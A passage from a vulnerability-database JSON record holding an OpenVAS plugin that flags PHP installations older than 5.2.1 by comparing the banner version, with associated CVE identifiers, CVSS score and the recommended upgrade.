"CVE-2007-1825", "CVE-2007-1884", "CVE-2007-0910", "CVE-2007-1383", "CVE-2007-0988", "CVE-2007-1887", "CVE-2007-1376", "CVE-2007-1889", "CVE-2007-1380", "CVE-2007-0905", "CVE-2007-1700", "CVE-2007-0906", "CVE-2007-0908"], "description": "PHP version smaller than 5.2.1 suffers from multiple vulnerabilities.", "modified": "2018-07-09T00:00:00", "published": "2012-06-21T00:00:00", "id": "OPENVAS:1361412562310110175", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310110175", "type": "openvas", "title": "PHP Version < 5.2.1 Multiple Vulnerabilities", "sourceData": 
"##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: nopsec_php_5_2_1.nasl 10460 2018-07-09 07:50:03Z cfischer $\n#\n# PHP Version < 5.2.1 Multiple Vulnerabilities\n#\n# Authors:\n# Songhan Yu <syu@nopsec.com>\n#\n# Copyright:\n# Copyright NopSec Inc. 2012, http://www.nopsec.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:php:php\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.110175\");\n script_version(\"$Revision: 10460 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-07-09 09:50:03 +0200 (Mon, 09 Jul 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-21 11:43:12 +0100 (Thu, 21 Jun 2012)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2006-6383\", \"CVE-2007-0905\", \"CVE-2007-0906\", \"CVE-2007-0907\", \"CVE-2007-0908\",\n \"CVE-2007-0909\", \"CVE-2007-0910\", \"CVE-2007-0988\", \"CVE-2007-1376\", \"CVE-2007-1380\",\n \"CVE-2007-1383\", \"CVE-2007-1452\", \"CVE-2007-1453\", \"CVE-2007-1454\", \"CVE-2007-1700\",\n \"CVE-2007-1701\", \"CVE-2007-1824\", \"CVE-2007-1825\", \"CVE-2007-1835\", \"CVE-2007-1884\",\n \"CVE-2007-1885\", 
\"CVE-2007-1886\", \"CVE-2007-1887\", \"CVE-2007-1889\", \"CVE-2007-1890\",\n \"CVE-2007-4441\", \"CVE-2007-4586\");\n script_bugtraq_id(21508, 22496, 22805, 22806, 22862, 22922, 23119, 23120, 23219, 23233, 23234,\n 23235, 23236, 23237, 23238);\n script_name(\"PHP Version < 5.2.1 Multiple Vulnerabilities\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright NopSec Inc. 2012\");\n script_dependencies(\"gb_php_detect.nasl\");\n script_mandatory_keys(\"php/installed\");\n\n script_tag(name:\"solution\", value:\"Update PHP to version 5.2.1 or later.\");\n\n script_tag(name:\"summary\", value:\"PHP version smaller than 5.2.1 suffers from multiple vulnerabilities.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( isnull( port = get_app_port( cpe:CPE ) ) ) exit( 0 );\nif( ! vers = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( version_is_less( version:vers, test_version:\"5.2.1\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"5.2.1\" );\n security_message( data:report, port:port );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}